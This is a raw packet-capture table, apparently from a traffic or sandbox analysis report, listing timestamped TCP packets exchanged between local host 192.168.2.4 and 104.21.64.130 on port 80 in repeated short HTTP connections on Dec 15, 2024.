                                                            Dec 15, 2024 19:36:45.512571096 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.513375044 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.633400917 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.633495092 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.633913040 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.633913994 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.634032965 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.716994047 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.754448891 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.837529898 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.837579012 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.982326984 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:46.102824926 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.102859020 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.102912903 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.460722923 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.513456106 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:46.721240997 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.721443892 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.763473988 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:46.763480902 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.005464077 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.060340881 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.120404959 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.120481968 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.121190071 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.393587112 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.393754005 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.393958092 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.394120932 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.394618988 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.394678116 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.397589922 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.518373966 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.747931957 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.868160009 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.134392023 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.134417057 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.134459019 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.191185951 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.312125921 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.312648058 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.312897921 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.432992935 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.669907093 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.748574018 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.789861917 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.789875031 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.794799089 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.029824972 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.075980902 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.151165962 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.151892900 CET4979680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.272114992 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.272139072 CET8049796104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.272243023 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.272301912 CET4979680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.272524118 CET4979680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.392240047 CET8049796104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.400815010 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.451103926 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.623008013 CET4979680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.648510933 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.701097012 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.743388891 CET8049796104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.743412018 CET8049796104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.743427992 CET8049796104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:13.359605074 CET8049796104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:13.404114962 CET4979680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.618988991 CET8049796104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:13.669943094 CET4979680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.747127056 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.747205973 CET4979680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.748047113 CET4979780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.868076086 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:13.868225098 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.868479013 CET8049797104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:13.868709087 CET8049796104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:13.868706942 CET4979780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.868746042 CET4979780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.868767023 CET4979680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:13.989444017 CET8049797104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:14.216994047 CET4979780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:14.336951971 CET8049797104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:14.337012053 CET8049797104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:14.337030888 CET8049797104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:14.956434965 CET8049797104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:14.998024940 CET4979780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:15.213340044 CET8049797104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:15.263848066 CET4979780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:15.338682890 CET4979780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:15.339520931 CET4980580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:15.459013939 CET8049797104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:15.459351063 CET8049805104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:15.459429026 CET4979780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:15.459445000 CET4980580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:15.459558010 CET4980580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:15.582266092 CET8049805104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:15.810451031 CET4980580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:15.936986923 CET8049805104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:15.937001944 CET8049805104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:15.937072039 CET8049805104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:16.574862003 CET8049805104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:16.622977018 CET4980580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:16.822527885 CET8049805104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:16.872858047 CET4980580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.087443113 CET4980580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.088010073 CET4980680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.207536936 CET8049805104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:17.207604885 CET4980580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.207896948 CET8049806104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:17.207969904 CET4980680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.208121061 CET4980680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.328073978 CET8049806104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:17.560520887 CET4980680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.655601025 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.680404902 CET8049806104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:17.680423975 CET8049806104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:17.680493116 CET8049806104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:17.775401115 CET8049807104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:17.775469065 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.775669098 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:17.895713091 CET8049807104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.123042107 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:18.242882967 CET8049807104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.243019104 CET8049807104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.294855118 CET8049806104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.341651917 CET4980680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:18.565634966 CET8049806104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.607418060 CET4980680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:18.687871933 CET4980680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:18.688925982 CET4980880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:18.808593035 CET8049806104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.808691978 CET4980680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:18.808953047 CET8049808104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.809060097 CET4980880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:18.809355021 CET4980880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:18.885478973 CET8049807104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.929364920 CET8049808104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:18.935617924 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:19.129477978 CET8049807104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:19.154647112 CET4980880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:19.169891119 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:19.275269985 CET8049808104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:19.275290012 CET8049808104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:19.275305033 CET8049808104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:19.321634054 CET8049807104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:19.373214960 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:19.897706985 CET8049808104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:19.954544067 CET4980880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.135431051 CET8049808104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:20.201031923 CET4980880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.665560007 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.665673018 CET4980880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.666835070 CET4980980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.786201954 CET8049807104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:20.786397934 CET4980780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.786696911 CET8049809104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:20.786729097 CET8049808104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:20.786812067 CET4980880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.786931992 CET4980980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.787034988 CET4980980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:20.907358885 CET8049809104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:21.139128923 CET4980980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:21.260493994 CET8049809104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:21.260531902 CET8049809104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:21.260565996 CET8049809104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:21.874476910 CET8049809104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:21.919915915 CET4980980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:22.114371061 CET8049809104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:22.169780970 CET4980980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:22.248363972 CET4980980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:22.249357939 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:22.368609905 CET8049809104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:22.369050026 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:22.369239092 CET4980980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:22.369282961 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:22.369469881 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:22.491832972 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:22.716738939 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:22.836746931 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:22.836781979 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:22.836817026 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:23.494529963 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:23.544799089 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:23.710345030 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:23.763557911 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:23.902086020 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:23.950999022 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.181943893 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.182763100 CET4981180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.303164959 CET8049810104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.303184986 CET8049811104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.303217888 CET4981080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.303308964 CET4981180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.303513050 CET4981180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.327378035 CET4981280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.423356056 CET8049811104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.447155952 CET8049812104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.447421074 CET4981280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.447607994 CET4981280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.568732977 CET8049812104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.654412985 CET4981180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.774411917 CET8049811104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.774544001 CET8049811104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.774557114 CET8049811104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.795104980 CET4981280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:24.915076971 CET8049812104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:24.915230036 CET8049812104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:25.389305115 CET8049811104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:25.435390949 CET4981180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.534591913 CET8049812104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:25.591749907 CET4981280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.662014008 CET8049811104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:25.716651917 CET4981180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.789246082 CET8049812104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:25.799823999 CET4981180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.799993038 CET4981280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.801003933 CET4981380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.920670986 CET8049811104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:25.920763969 CET4981180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.920948029 CET8049812104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:25.921006918 CET4981280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.921515942 CET8049813104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:25.921593904 CET4981380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:25.921802044 CET4981380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:26.046153069 CET8049813104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:26.279258013 CET4981380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:26.408998013 CET8049813104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:26.409015894 CET8049813104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:26.409024954 CET8049813104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:27.012936115 CET8049813104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:27.060441017 CET4981380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:27.316521883 CET8049813104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:27.357311964 CET4981380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:27.447439909 CET4981380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:27.448240995 CET4981480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:27.567681074 CET8049813104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:27.567738056 CET4981380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:27.568223953 CET8049814104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:27.568298101 CET4981480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:27.568474054 CET4981480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:27.688354969 CET8049814104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:27.919883966 CET4981480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:28.039751053 CET8049814104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:28.039768934 CET8049814104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:28.039792061 CET8049814104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:28.671375036 CET8049814104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:28.716687918 CET4981480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:28.973556042 CET8049814104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:29.013529062 CET4981480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:29.089615107 CET4981480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:29.090259075 CET4981580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:29.213392973 CET8049814104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:29.213512897 CET4981480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:29.213551998 CET8049815104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:51.888434887 CET4983480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:52.005538940 CET8049832104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:52.005669117 CET4983280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:52.006581068 CET8049833104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:52.006634951 CET4983380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:52.010426998 CET8049834104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:52.014097929 CET4983480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:52.014276981 CET4983480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:52.134119034 CET8049834104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:52.373028994 CET4983480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:52.493634939 CET8049834104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:52.493674040 CET8049834104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:52.493701935 CET8049834104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:53.104518890 CET8049834104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:53.154181004 CET4983480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:53.347718000 CET8049834104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:53.354077101 CET4983480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:53.464237928 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:53.475014925 CET8049834104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:53.480284929 CET4983480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:53.584615946 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:53.584834099 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:53.584983110 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:53.704766035 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:53.936096907 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:54.056368113 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:54.056402922 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:54.056432009 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:54.685503006 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:54.732409954 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:54.933007956 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:54.982285976 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:55.127337933 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:55.173075914 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:55.268219948 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:55.268876076 CET4983680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:55.391460896 CET8049836104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:55.391505003 CET8049835104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:55.391556978 CET4983680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:55.391587973 CET4983580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:55.391752958 CET4983680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:55.512533903 CET8049836104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:55.748399019 CET4983680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:55.868952990 CET8049836104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:55.868995905 CET8049836104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:55.869024992 CET8049836104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:56.492911100 CET8049836104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:56.544797897 CET4983680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.655056953 CET4983680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.655678034 CET4983780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.729398012 CET8049836104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:56.729582071 CET4983680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.775933981 CET8049837104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:56.775976896 CET8049836104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:56.776047945 CET4983680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.776156902 CET4983780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.776158094 CET4983780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.780040979 CET4983880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.896171093 CET8049837104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:56.899919987 CET8049838104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:56.899988890 CET4983880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:56.900105953 CET4983880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:57.020697117 CET8049838104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:57.123029947 CET4983780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:57.245593071 CET8049837104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:57.245637894 CET8049837104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:57.250092983 CET4983880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:57.370779991 CET8049838104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:57.370826006 CET8049838104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:57.370857000 CET8049838104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:57.863766909 CET8049837104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:57.922091961 CET4983780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:57.987832069 CET8049838104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:58.044811964 CET4983880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.128935099 CET8049837104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:58.169809103 CET4983780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.224349022 CET8049838104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:58.279295921 CET4983880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.369259119 CET4983780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.369539976 CET4983880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.370342970 CET4983980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.496154070 CET8049837104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:58.496239901 CET4983780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.568785906 CET8049839104.21.64.130192.168.2.4
